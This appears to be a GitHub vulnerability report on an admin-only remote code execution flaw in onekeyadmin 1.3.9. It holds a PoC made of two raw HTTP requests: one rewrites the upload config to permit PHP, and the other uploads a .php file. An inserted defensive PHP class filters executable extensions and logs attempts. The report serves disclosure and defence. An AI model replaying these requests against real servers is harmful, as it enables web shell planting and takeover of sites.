
Remote code execution caused by uploading arbitrary files in the background #1

Open
qbz95aaa opened this issue Jan 10, 2023 · 1 comment


qbz95aaa commented Jan 10, 2023

Vulnerability affects product: onekeyadmin
Vulnerability affects version: 1.3.9
Vulnerability type: Remote code execution
Vulnerability details: Remote code execution caused by uploading arbitrary files in the background

Vulnerability location
The vulnerability occurs in app\admin\controller\File#upload. Although there are restrictions on ext, we found that the app\admin\controller\Config#update method can update the limit.
Vulnerability reproduction
Conditions: Admin
PoC
The first step is to update the configuration to allow uploading php files:

```http
POST /admin1/config/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 398
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/config/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close

{"title":"上传限制","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}
```

The second step is to upload the malicious file:

```http
POST /admin1/file/upload HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 280
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP
Accept: */*
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close

------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="name"

templatex
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php

------WebKitFormBoundaryARP8fRC2kb4GP3oP--
```
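The root cause described in the report is that the upload extension check in File#upload is only as strong as a setting that Config#update lets any admin rewrite, so adding `php` to the "other" list turns the upload endpoint into a web shell drop. The block below is an added example, not code from onekeyadmin: it shows the defence-in-depth shape a fix would take, with a hard-coded deny-list of server-executable extensions that the configurable allow-list cannot override, applied both when the config is saved and again when a file is uploaded. The `UploadGuard` class, its method names, the deny-list contents and the sample config at the bottom are assumptions for illustration; the upload check also goes slightly beyond the report by rejecting multi-extension names such as `x.php.txt`.

```php
<?php
declare(strict_types=1);

// Added example (not onekeyadmin's code). Defence in depth for the issue
// above: an admin-editable allow-list is filtered against a fixed deny-list
// of executable extensions at config-save time, and the upload handler
// re-checks the final filename, so a config change alone cannot enable
// PHP uploads. Names and sample data here are assumptions.

final class UploadGuard
{
    /** Illustrative deny-list of extensions a PHP web server may execute. */
    private const EXECUTABLE_EXT = ['php', 'phtml', 'phar', 'pht', 'htaccess'];

    /**
     * Normalise one comma-separated ext list as stored in the config
     * (e.g. "png,jpg,jpeg") and strip every executable extension from it.
     * Returns [allowed, rejected] so the caller can persist the first
     * and log the second.
     */
    public static function sanitizeExtList(string $csv): array
    {
        $allowed = [];
        $rejected = [];
        foreach (explode(',', $csv) as $raw) {
            $ext = strtolower(trim($raw));
            if ($ext === '') {
                continue;
            }
            if (in_array($ext, self::EXECUTABLE_EXT, true)) {
                $rejected[] = $ext;
            } else {
                $allowed[] = $ext;
            }
        }
        return [array_values(array_unique($allowed)), $rejected];
    }

    /**
     * Walk the nested "upload" value from the report
     * ({"admin":{"ext":{...}}, "index":{"ext":{...}}}) and sanitise
     * every ext entry. Meant to run inside Config#update before saving;
     * dropped entries are appended to $log for the audit trail.
     */
    public static function sanitizeUploadConfig(array $value, array &$log): array
    {
        foreach ($value as $scope => $settings) {
            foreach ($settings['ext'] ?? [] as $kind => $csv) {
                [$allowed, $rejected] = self::sanitizeExtList((string) $csv);
                $value[$scope]['ext'][$kind] = implode(',', $allowed);
                foreach ($rejected as $ext) {
                    $log[] = "config update tried to allow .$ext in $scope/$kind; dropped";
                }
            }
        }
        return $value;
    }

    /**
     * Final gate in File#upload: every dotted segment after the base name
     * must be in the allow-list and not executable, so "1.php",
     * "1.PHP" and "x.php.txt" are all rejected. Path separators are
     * stripped first so the check runs on the bare filename.
     */
    public static function isAllowedFilename(string $filename, array $allowList): bool
    {
        $base = basename(str_replace('\\', '/', $filename));
        $parts = explode('.', strtolower($base));
        if (count($parts) < 2) {
            return false; // no extension at all
        }
        array_shift($parts); // drop the base name, keep extension chain
        foreach ($parts as $ext) {
            if ($ext === ''
                || in_array($ext, self::EXECUTABLE_EXT, true)
                || !in_array($ext, $allowList, true)) {
                return false;
            }
        }
        return true;
    }
}

// Constructed sample modelled on the report's config update, where the
// "other" list ends in "php".
$log = [];
$config = ['admin' => ['ext' => ['image' => 'png,jpg', 'other' => 'zip,rar,txt,php']]];
$clean = UploadGuard::sanitizeUploadConfig($config, $log);

$allow = explode(',', $clean['admin']['ext']['other']);
var_dump(UploadGuard::isAllowedFilename('1.php', $allow));
var_dump(UploadGuard::isAllowedFilename('report.txt', $allow));
var_dump(UploadGuard::isAllowedFilename('x.php.txt', $allow));
print_r($log);
```

With this in place the config save silently drops `php` from the "other" list and records that it did so, and even if an entry slipped through some other path, the upload gate rejects `1.php` on its own. The log entries are the detection hook: a config update that tries to allow an executable extension is exactly the event an operator wants to alert on.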

qbz95aaa (Author) commented:

Found by Chaitin Security Research Lab
